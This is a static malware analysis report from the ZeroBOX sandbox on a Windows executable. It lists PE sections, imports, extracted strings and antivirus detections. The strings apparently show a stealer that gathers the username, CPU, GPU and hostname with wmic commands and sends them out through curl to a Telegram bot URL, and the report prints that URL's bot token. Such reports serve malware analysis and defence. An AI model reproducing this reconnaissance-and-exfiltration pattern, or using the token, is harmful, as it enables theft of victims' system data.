Static | ZeroBOX

PE Compile Time

2023-09-17 00:45:50

PDB Path

C:\Users\Francesco\source\repos\cgpcc\x64\Debug\cgpcc.pdb

PE Imphash

e6071fde7c8f939e596987a857a78bc8

PEiD Signatures

Microsoft Visual C++ V8.0 (Debug)

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.textbss 0x00001000 0x00010000 0x00000000 0.0
.text 0x00011000 0x0000ee20 0x0000f000 4.03278367976
.rdata 0x00020000 0x00004f91 0x00005000 2.72520440357
.data 0x00025000 0x00000bd0 0x00000600 0.854339214713
.pdata 0x00026000 0x000029a0 0x00002a00 2.13700351968
.idata 0x00029000 0x000017e2 0x00001800 3.92516042413
.msvcjmc 0x0002b000 0x0000017f 0x00000200 0.731968812595
.00cfg 0x0002c000 0x00000175 0x00000200 0.474029545746
.rsrc 0x0002d000 0x0000043c 0x00000600 2.14297088193
.reloc 0x0002e000 0x0000033b 0x00000400 1.54401878217

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x0002d170 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library VCRUNTIME140D.dll:
0x140029250 memcpy
0x140029258 memmove
0x140029260 __std_exception_copy
0x140029268 __std_exception_destroy
0x140029270 _CxxThrowException
0x140029278 __C_specific_handler
0x140029290 __current_exception
0x1400292a8 __vcrt_GetModuleHandleW
0x1400292b0 __vcrt_LoadLibraryExW
0x1400292b8 memchr
0x1400292c0 memcmp
Library VCRUNTIME140_1D.dll:
0x140029338 __CxxFrameHandler4
Library ucrtbased.dll:
0x140029398 _set_new_mode
0x1400293a0 __p__commode
0x1400293a8 _free_dbg
0x1400293b0 strcpy_s
0x1400293b8 strcat_s
0x1400293c8 _seh_filter_dll
0x1400293d0 _initialize_onexit_table
0x1400293e0 _execute_onexit_table
0x1400293e8 _crt_atexit
0x1400293f8 terminate
0x140029400 _wmakepath_s
0x140029408 _wsplitpath_s
0x140029410 wcscpy_s
0x140029418 __p___argv
0x140029420 strlen
0x140029428 _popen
0x140029430 _pclose
0x140029438 fgets
0x140029440 feof
0x140029448 _CrtDbgReport
0x140029450 _invalid_parameter
0x140029458 _configthreadlocale
0x140029460 _cexit
0x140029468 __p___argc
0x140029470 _set_fmode
0x140029478 _exit
0x140029480 exit
0x140029488 _callnewh
0x140029490 _initterm
0x1400294a8 _c_exit
0x1400294b0 _configure_narrow_argv
0x1400294b8 __setusermatherr
0x1400294c0 _set_app_type
0x1400294c8 _seh_filter_exe
0x1400294d0 _CrtDbgReportW
0x1400294d8 _crt_at_quick_exit
0x1400294e0 malloc
0x1400294e8 _initterm_e
Library KERNEL32.dll:
0x140029000 HeapFree
0x140029008 IsDebuggerPresent
0x140029010 RaiseException
0x140029018 MultiByteToWideChar
0x140029020 WideCharToMultiByte
0x140029028 RtlCaptureContext
0x140029030 RtlLookupFunctionEntry
0x140029038 RtlVirtualUnwind
0x140029040 UnhandledExceptionFilter
0x140029050 GetCurrentProcess
0x140029058 TerminateProcess
0x140029068 QueryPerformanceCounter
0x140029070 GetCurrentProcessId
0x140029078 GetSystemTimeAsFileTime
0x140029080 InitializeSListHead
0x140029088 GetStartupInfoW
0x140029090 GetProcAddress
0x140029098 FreeLibrary
0x1400290a0 VirtualQuery
0x1400290a8 GetProcessHeap
0x1400290b0 GetCurrentThreadId
0x1400290b8 HeapAlloc
0x1400290c0 GetLastError
0x1400290c8 GetModuleHandleW

!This program cannot be run in DOS mode.
.textbss
`.rdata
@.data
.pdata
@.idata
@.msvcjmc
.00cfg
@.rsrc
@.reloc
H+E(H;
H+E(H;
H+E(H;E
D$pHc@
D$8HcD$ H
@UVWAVH
VATAUAWH
(A_A]A\^
@SUWATAUAVAWH
A_A^A]A\_][
D$H9D$ s"
H9D$Hr
H9D$Hs
$Hc@<H
D$ H9D$(u
H3D$0H
H9D$ u
D$ Hc@<H
H;D$@v
D$PfA9
fD9TDPt
USVWATAUAVH
u+L95.
te+}o;>r^
A^A]A\_^[]
5Genu
5Auth
invalid string position
_Proxy
_Fancyptr
_Alloc_max
_Masked
buffer
result
hostname
null pointer cannot point to a block of non-zero size
_Proxy
_New_ptr
_New_ptr
_New_ptr
C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include\xmemory
Unknown exception
bad array new length
invalid argument
"https://api.telegram.org/bot6671953916:AAEDCJrljqlZN-m9CC5G64z0XK3h4Tvml5E/sendMessage?chat_id=5927013047&parse_mode=html&text=
string too long
popen failed!
wmic computersystem get username
wmic cpu get name
wmic path win32_VideoController get name
Hostname:
curl -s -o nul
bad allocation
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:
char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
Stack memory was corrupted
A local variable was used before it was initialized
Stack memory around _alloca was corrupted
Unknown Runtime Check Error
Unknown Filename
Unknown Module Name
Run-Time Check Failure #%d - %s
Stack corrupted near unknown variable
Stack area around _alloca memory reserved by this function is corrupted
Data: <
Allocation number within this function:
Size:
Address: 0x
Stack area around _alloca memory reserved by this function is corrupted
%s%s%p%s%zd%s%d%s%s%s%s%s
A variable is being used without being initialized.
Stack pointer corruption
Cast to smaller type causing loss of data
Stack memory corruption
Local variable used before initialization
Stack around _alloca corrupted
RegOpenKeyExW
RegQueryValueExW
RegCloseKey
PDBOpenValidate5
C:\Users\Francesco\source\repos\cgpcc\x64\Debug\cgpcc.pdb
.?AVbad_array_new_length@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVtype_info@@
??0_Lockit@std@@QEAA@H@Z
??1_Lockit@std@@QEAA@XZ
?_Xlength_error@std@@YAXPEBD@Z
?_Xout_of_range@std@@YAXPEBD@Z
?uncaught_exception@std@@YA_NXZ
?good@ios_base@std@@QEBA_NXZ
?flags@ios_base@std@@QEBAHXZ
?width@ios_base@std@@QEBA_JXZ
?width@ios_base@std@@QEAA_J_J@Z
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z
?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ
?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBAPEAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ
?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADXZ
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ
?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
MSVCP140D.dll
memchr
memcmp
memcpy
memmove
__std_exception_copy
__std_exception_destroy
_CxxThrowException
__CxxFrameHandler4
__C_specific_handler
__C_specific_handler_noexcept
__std_type_info_destroy_list
__current_exception
__current_exception_context
__vcrt_GetModuleFileNameW
__vcrt_GetModuleHandleW
__vcrt_LoadLibraryExW
VCRUNTIME140D.dll
VCRUNTIME140_1D.dll
_invalid_parameter
_CrtDbgReport
_pclose
_popen
strlen
_callnewh
malloc
_CrtDbgReportW
_seh_filter_exe
_set_app_type
__setusermatherr
_configure_narrow_argv
_initialize_narrow_environment
_get_initial_narrow_environment
_initterm
_initterm_e
_set_fmode
__p___argc
__p___argv
_cexit
_c_exit
_register_thread_local_exe_atexit_callback
_configthreadlocale
_set_new_mode
__p__commode
_free_dbg
strcpy_s
strcat_s
__stdio_common_vsprintf_s
_seh_filter_dll
_initialize_onexit_table
_register_onexit_function
_execute_onexit_table
_crt_atexit
_crt_at_quick_exit
terminate
_wmakepath_s
_wsplitpath_s
wcscpy_s
ucrtbased.dll
GetCurrentThreadId
IsDebuggerPresent
RaiseException
MultiByteToWideChar
WideCharToMultiByte
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
InitializeSListHead
GetStartupInfoW
GetModuleHandleW
GetLastError
HeapAlloc
HeapFree
GetProcessHeap
VirtualQuery
FreeLibrary
GetProcAddress
KERNEL32.dll
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
"invalid argument"
"null pointer cannot point to a block of non-zero size"
Runtime Check Error.
Unable to display RTC Message.
Run-Time Check Failure #%d - %s
bin\amd64\MSPDB140.DLL
VCRUNTIME140D.dll
api-ms-win-core-registry-l1-1-0.dll
advapi32.dll
SOFTWARE\Wow6432Node\Microsoft\VisualStudio\14.0\Setup\VC
ProductDir
MSPDB140
MSPDB140
C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include\xmemory
Antivirus Signature
Bkav W32.AIDetectMalware.64
Lionic Clean
Elastic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Cylance Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win64.Exploit.ct
Trapmine Clean
FireEye Clean
Emsisoft Clean
SentinelOne Clean
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
DeepInstinct Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
AVG Clean
Avast Clean
CrowdStrike Clean
No IRMA results available.